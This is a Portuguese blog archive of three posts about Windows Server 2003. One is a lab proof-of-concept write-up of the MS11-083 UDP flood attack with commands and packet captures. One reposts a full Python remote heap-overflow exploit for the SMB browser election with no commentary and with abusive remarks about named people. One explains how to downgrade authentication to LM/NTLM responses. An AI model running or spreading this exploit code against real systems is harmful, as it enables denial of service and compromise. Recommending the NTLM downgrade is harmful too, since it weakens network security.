Tag Archive: 2003 server


PoC MS11-083

Filed Under: Hacking, Security by admin — Leave a comment
14 de novembro de 2011

Informado pela sans..

An integer overflow in the TCP/IP stack allows random code execution from a stream of UDP packets sent to a closed port. Permission for the attacker are at kernel level.

Depois de sair o exploit para a vulnerabilidade MS11-083 realizei a prova de conceito para verificar o que ocorre na tal situação.

A Mirosoft informou que para se explorada será necessário enviar aproximadamente 2^32 pacotes UDP para obter êxito na exploração.

No lab temos um Debian que faz o ataque e o Windows 2003 Standard com 1Gb de memória RAM 4 CPU’s que será atacado.

O exploit divulgado publicamente: http://packetstormsecurity.org/files/106873/winnuke2011.sh.txt , utilizei somente o código em C .

 

Compilando….

debian:~/2003# gcc -lpthread MS11-083.c -o MS11-083

debian:~/2003# ./MS11-083
[+] MS11-083 DoS/PoC exploit
[!] Usage : ./MS11-083 <server> <port>

 

No Windows.. tudo sobre controle..

 

Antes do Ataque

Antes do Ataque

 

 

Começamos o ataque…

debian:~/2003# ./MS11-083 192.168.10.131 1000
[+] MS11-083 DoS/PoC exploit
[-] Sending payload ‘ZSW”<kc’ULJ=VK%XE-cP0*%(‘bORT=”;D”[c=S'
[-] Thread number 0 started
[-] Sending payload ’60&a;%=^,7FKMc[D=J>90J6Y7DR]*PC<&8′.%) ‘
[-] Thread number 1 started
[-] Sending payload ‘dCJe-f+65f9@NJhH-c”!?XU% (7#TDOhjIa+`=_)’
[-] Thread number 2 started
[-] Sending payload ‘/;.S”0:#dd=kSACiD=S!OLO#V/ZLP<]L`?,/D$’
[-] Thread number 3 started
[-] Sending payload ‘”S.Q]=JOT” (8%O)-4bF+NeN I@**A<.Di/RV\5>’
[-] Thread number 4 started
[-] Sending payload ‘Ag0BMF”FF[ aB]*9*UQi<2H!8X&LieC>`U1AKQ7B’
[-] Thread number 5 started
[-] Sending payload ‘,=aTOe9-]”A&,B-;:b,f0<@BVX#VbM’WQD;K_f’
[-] Thread number 6 started
[-] Sending payload ‘AH2M R!h\+#H>e.VD-bDI;1″JJ’ JeQG6Sg2C’
[-] Thread number 7 started
[-] Sending payload ‘*X-KOSYQF!86#M53C^f1Z+jM=*+[.e56&0h)kiQ'
[-] Thread number 8 started

 

Em questão de segundos veremos o gráfico de performace do Windows..

Após o ataque

Após o ataque

Em outro console temos a saída do tcpdump

debian:~/2003# tcpdump -X -vvv -i eth0 dst host 192.168.10.131
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
23:47:47.221788 IP (tos 0×0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 69) 192.168.10.128.33405 > 192.168.10.131.1000: [udp sum ok] UDP, length 41
0×0000:  4500 0045 0000 4000 4011 a454 c0a8 0a80  E..E..@.@..T….
0×0010:  c0a8 0a83 827d 03e8 0031 bee0 6250 5d2a  …..}…1..bP]*
0×0020:  3b2e 5028 246a 5d3d 5632 273b 3a49 2156  ;.P($j]=V2′;:I!V
0×0030:  2069 3a2d 3725 5f22 5723 284d 5536 2741  .i:-7%_”W#(MU6′A
0×0040:  465a 4b4c 00                             FZKL.
23:47:47.221846 IP (tos 0×0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 69) 192.168.10.128.33405 > 192.168.10.131.1000: [udp sum ok] UDP, length 41
0×0000:  4500 0045 0000 4000 4011 a454 c0a8 0a80  E..E..@.@..T….
0×0010:  c0a8 0a83 827d 03e8 0031 bee0 6250 5d2a  …..}…1..bP]*
0×0020:  3b2e 5028 246a 5d3d 5632 273b 3a49 2156  ;.P($j]=V2′;:I!V
0×0030:  2069 3a2d 3725 5f22 5723 284d 5536 2741  .i:-7%_”W#(MU6′A
0×0040:  465a 4b4c 00                             FZKL.
23:47:47.221850 IP (tos 0×0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 69) 192.168.10.128.33405 > 192.168.10.131.1000: [udp sum ok] UDP, length 41
0×0000:  4500 0045 0000 4000 4011 a454 c0a8 0a80  E..E..@.@..T….
0×0010:  c0a8 0a83 827d 03e8 0031 bee0 6250 5d2a  …..}…1..bP]*
0×0020:  3b2e 5028 246a 5d3d 5632 273b 3a49 2156  ;.P($j]=V2′;:I!V
0×0030:  2069 3a2d 3725 5f22 5723 284d 5536 2741  .i:-7%_”W#(MU6′A
0×0040:  465a 4b4c 00                             FZKL.
23:47:47.221853 IP (tos 0×0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 69) 192.168.10.128.33405 > 192.168.10.131.1000: [udp sum ok] UDP, length 41
0×0000:  4500 0045 0000 4000 4011 a454 c0a8 0a80  E..E..@.@..T….
0×0010:  c0a8 0a83 827d 03e8 0031 bee0 6250 5d2a  …..}…1..bP]*
0×0020:  3b2e 5028 246a 5d3d 5632 273b 3a49 2156  ;.P($j]=V2′;:I!V
0×0030:  2069 3a2d 3725 5f22 5723 284d 5536 2741  .i:-7%_”W#(MU6′A
0×0040:  465a 4b4c 00                             FZKL.
23:47:47.221856 IP (tos 0×0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 69) 192.168.10.128.33405 > 192.168.10.131.1000: [udp sum ok] UDP, length 41
0×0000:  4500 0045 0000 4000 4011 a454 c0a8 0a80  E..E..@.@..T….
0×0010:  c0a8 0a83 827d 03e8 0031 bee0 6250 5d2a  …..}…1..bP]*
0×0020:  3b2e 5028 246a 5d3d 5632 273b 3a49 2156  ;.P($j]=V2′;:I!V
0×0030:  2069 3a2d 3725 5f22 5723 284d 5536 2741  .i:-7%_”W#(MU6′A
0×0040:  465a 4b4c 00                             FZKL.

 

Nesta situação temos somente 1 computador atacando, o script esta utilizando toda a CPU do Debian.

PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
3541 root         20   0  273m    976  484   S  97.2     0.2           0:16.40 MS11-083

 

No atual lab não conseguimos causar um DoS no alvo, mas de acordo com os resultados vimos que isso seria possível seeeeeeeeee… o firewall estivesse desabilitado….

Agora vamos habilitar o firewall do windows, e voltaremos ao ataque e os gráficos…

 

Firewalled

Firewalled

 

Ou seja, o ataque pode ser mitigado sem muitos problemas. Para completar os 2^32 pacotes enviados levaria aproximadamente 52 dias, paramos por aqui sem a verdadeira prova que seria possível executar um código remotamente.

Mais informações sobre o Bug: http://technet.microsoft.com/en-us/security/bulletin/ms11-083

Resumindo, sempre firewall ativado e sistema atualizado!

Outro exploit e mais infos pode ser encontrado também em: http://blog.rootentropy.co.za/post/12567851289/ms11-083-traffic-capture

 

[]‘s

Sergito

Tags: , , , ,
Comment

MS Windows Server 2003 Remote Heap Overflow

Filed Under: Hacking, Security by admin — Leave a comment
15 de fevereiro de 2011

Sem muitos comentários, simples e direto, Windows 2003 server remote Heap Overflow !

 

####################################################################################
#MS Windows Server 2003 AD Pre-Auth BROWSER ELECTION Remote Heap Overflow
#Release date: 2011-02-14
#Anonymous Comment: Apologies if this puts a downer on the MSRC valentines
day sausage fest
#Author: Cupidon-3005
#Greet: Winny Thomas, Laurent Gaffie, h07
#Bug: Heap Overflow
#Remote Exploitability: Unlikely
#Local Exploitability: Likely
#Context: Broadcast, Pre-Auth
#Special Valentines Greetings: Ruben Santamarta, is your password still
"hijodeputa"? You look even more like a dumb fuck than you used to.
#From dailydave: [
https://lists.immunityinc.com/pipermail/dailydave/20110121/000057.html], So
your 31337 con is the only place to get 0day? Here's some pre-auth /
#broadcast 0day free for all on FD with 0% conference whoring, and punks are
welcome as well.
#####################################################################################
#Mrxsmb.sys, around BowserWriteErrorLog+0x175, while trying to copy 1go from
ESI to EDI ...
#Code will look something like this:
#if ((Len + 1) * sizeof(WCHAR)) > TotalBufferSize) { Len =
TotalSize/sizeof(WCHAR) - 1; }
#-1 causes Len to go 0xFFFFFFFF
#Feel free to reuse this code without restrictions and ask Kingcope-Fag to
perform his FTP FU on SMB, he might have more luck than MS.
"
import socket,sys,struct
from socket import *

if len(sys.argv)<=4:
 sys.exit("""usage: python sploit.py UR-IP BCAST-IP NBT-NAME AD-NAME
 example: python sploit.py 192.168.1.10 192.168.1.255 OhYeah
AD-NETBIOS-NAME""")

ourip = sys.argv[1]
host = sys.argv[2]
srcname = sys.argv[3].upper()
dstname = sys.argv[4].upper()

ELEC            = "\x42\x4f\x00"
WREDIR          = "\x41\x41\x00"

def encodename(nbt,service):
    final = '\x20'+''.join([chr((ord(i)>>4) + ord('A'))+chr((ord(i)&0xF) +
ord('A')) for i in nbt])+((15 - len(nbt)) * str('\x43\x41'))+service
    return final

def lengthlittle(packet,addnum):
    length = struct.pack("<i", len(packet)+addnum)[0:2]
    return length

def lengthbig(packet,addnum):
    length = struct.pack(">i", len(packet)+addnum)[2:4]
    return length

def election(srcname):
    elec = "\x08"
    elec+= "\x09" #Be the boss or die
    elec+= "\xa8\x0f\x01\x20" #Be the boss or die
    elec+= "\x1b\xe9\xa5\x00" #Up time
    elec+= "\x00\x00\x00\x00" #Null, like SDLC
    elec+= srcname+"\x00"
    return elec

def smbheaderudp(op="\x25"):
    smbheader= "\xff\x53\x4d\x42"
    smbheader+= op
    smbheader+= "\x00"
    smbheader+= "\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00\x00\x00\x00\x00\x00\x00\x00"
    smbheader+=  "\x00\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00\x00"
    smbheader+= "\x00\x00"
    return smbheader

def
trans2mailslot(tid="\x80\x0b",ip=ourip,sname="LOVE-SDL",dname="SRD-LOVE",namepipe="\MAILSLOT\BROWSE",srcservice="\x41\x41\x00",dstservice="\x41\x41\x00",pbrowser=""):
    packetbrowser  =  pbrowser
    packetmailslot = "\x01\x00"
    packetmailslot+= "\x00\x00"
    packetmailslot+= "\x02\x00"
    packetmailslot+= lengthlittle(packetbrowser+namepipe,4)
    packetmailslot+= namepipe +"\x00"
    packetdatagram = "\x11"
    packetdatagram+= "\x02"
    packetdatagram+= tid
    packetdatagram+= inet_aton(ip)
    packetdatagram+= "\x00\x8a"
    packetdatagram+= "\x00\xa7"
    packetdatagram+= "\x00\x00"
    packetdatagramname = encodename(sname,srcservice)
    packetdatagramname+= encodename(dname,dstservice)
    smbheader= smbheaderudp("\x25")
    packetrans2 = "\x11"
    packetrans2+= "\x00\x00"
    packetrans2+= lengthlittle(packetbrowser,0)
    packetrans2+= "\x00\x00"
    packetrans2+= "\x00\x00"
    packetrans2+= "\x00"
    packetrans2+= "\x00"
    packetrans2+= "\x00\x00"
    packetrans2+= "\xe8\x03\x00\x00"
    packetrans2+= "\x00\x00"
    packetrans2+= "\x00\x00"
    packetrans2+= "\x00\x00"
    packetrans2+= lengthlittle(packetbrowser,0)
    packetrans2+= lengthlittle(smbheader+packetrans2+packetmailslot,4)
    packetrans2+= "\x03"
    packetrans2+= "\x00"
    andoffset = lengthlittle(smbheader+packetrans2+packetmailslot,2)
    lengthcalc =
packetdatagramname+smbheader+packetrans2+packetmailslot+packetbrowser
    packetfinal =
packetdatagram+packetdatagramname+smbheader+packetrans2+packetmailslot+packetbrowser
    packetotalength = list(packetfinal)
    packetotalength[10:12] = lengthbig(lengthcalc,0)
    packetrans2final = ''.join(packetotalength)
    return packetrans2final

def sockbroad(host,sourceservice,destservice,packet):
   s = socket(AF_INET,SOCK_DGRAM)
   s.setsockopt(SOL_SOCKET, SO_BROADCAST,1)
   s.bind(('0.0.0.0', 138))
   try:
      packsmbheader = smbheaderudp("\x25")
      buffer0 =
trans2mailslot(tid="\x80\x22",ip=ourip,sname=srcname,dname=dstname,namepipe="\MAILSLOT\BROWSER",srcservice=sourceservice,
dstservice=destservice, pbrowser=packet)
      s.sendto(buffer0,(host,138))
   except:
      print "expected SDL error:", sys.exc_info()[0]
      raise

sockbroad(host,WREDIR,ELEC,election("A" * 410)) # -> Zing it! (between
~60->410)
print "Happy St-Valentine Bitches\nMSFT found that one loooooooong time
ago...."
####################################################################################


by packetstormsecurity




[]'s


Sergito


 

			


			

				
Tags: , , 

				

					
													Comment 
											
				

			


		


		

		


			

				
NTLM+2003 SERVER

				

					
Filed Under: Linux, Windows by admin — Leave a comment

					
12 de janeiro de 2010

				

			


			

				
Um tempo atrás tive que refazer o firewall da empresa onde trabalho, anteriormente utilizava a autenticação msnt_auth no qual solicitava ao usuário o login e senha do domínio para acessar a internet. Resolvi alterar esse modo de autenticação evitando esse pop-up e assim que o usuário logar e acessar a internet as credenciais são enviadas ao squid automaticamente sem a necessidade de digitar usuário e senha.


Porééééééééémmmm… me deparei com um problema, logando com meu usuário em um servidor 2003 server tentei navegar e estava solicitando a senha novamente. Digito a senha e mesmo assim nada de navegar..


Postei minha dúvida em forums e listas e ninguém me auxiliou, depois de muito trabalho conseguir achar a solução do meu problema, foi abaixar o nível de autenticação que o 2003 server tem para se comunicar com outros serviços, segue abaixo como resolver no 2003 server:


Iniciar > ferramentas adm > diretiva de segurança do controlador de domínio


Configurações de Segurança > Diretivas locais -> opções de segurança


Dai é só definir o item: “Segurança de rede: Nivel de Autenticação LAN MANAGER” para “ENVIAR RESPOSTAS LM e NTLM


Pronto!!


[]‘s Sergito

			


			

				
Tags: , , 

				

					
													Comment